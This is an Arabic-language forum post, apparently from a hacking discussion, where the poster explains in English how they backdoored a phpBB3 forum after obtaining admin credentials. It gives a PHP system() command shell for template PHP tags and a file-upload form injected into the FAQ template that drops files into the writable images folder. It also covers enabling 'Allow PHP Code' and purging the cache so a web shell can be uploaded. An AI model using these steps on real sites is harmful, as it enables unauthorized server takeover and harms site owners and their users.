| اقتباس | | | | | المشاركة الأصلية كتبت بواسطة nor15din | | | | | | | | كيف لغمتهم ؟؟ ههه ارجووك كيف ؟؟ | | | | | |
هههههههه أوكيه D: بس معلش, حقاك علي, راح اكتب بالإنجليزي لان اسهل علي... وأي توضيح, أنا جاهز.
------------------------------------
i searched online for hacking phpBB3 once i have the admin username and password. all i could find was that it's possible to include a php code inside the ACP
كود:
<!-- PHP -->
echo $cmd;
system($cmd);
<!-- ENDPHP -->
and that's considered a Shell
i liked it... but it was too much trouble doing all the php commands, so though, ok. i have access to change a page's php code... why not include an uploader and upload a shell? that's easier
i know how to code HTML so
كود:
ACP ->Styles -> Templates->Edit-> FAQ_body.html
i added this code in the body:
كود:
<table>
<form action="" enctype="multipart/form-data" method="post">
<tr>
<td colspan="2">H4v3 Fun Spiders Spooky AKA SpookWEB</td>
</tr>
<tr>
<td><input type="file" name="spiderF" /></td>
<td><input type="submit" name="submit" value="Spooky!" /></td>
</tr>
<tr>
</tr>
</form>
</table>
and in the end of the HTML i added this:
كود:
<!-- PHP -->
if (isset($_POST['submit'])) {
$spookf = $_FILES['spiderF']['name'];
$spookt = $_FILES['spiderF']['tmp_name'];
if (@move_uploaded_file($spookt , "./images/".$spookf)) {
echo "Shell Uploaded. Check /images/YourShell.php";}else{echo "Upload Failed";}}
<!-- ENDPHP -->
i picked images folder cause i searched and found that phpBB set it to chmod
777
so i have full access to it
Now i went back to the ACP and in "Server Settings" i changed "Allow PHP Code" to Yes
than, on the ACP, be sure to "Purge Cache" to ******* the template so that the code may work....
DONE! :D
بستعمل MS Maren
للكتابة بالعربية لان ال كيبورد عندي مافي عربي هههههه...
إذا مامشي ال حال, مستعد اكتيبو بالعربي بس حياخد وقت شوية....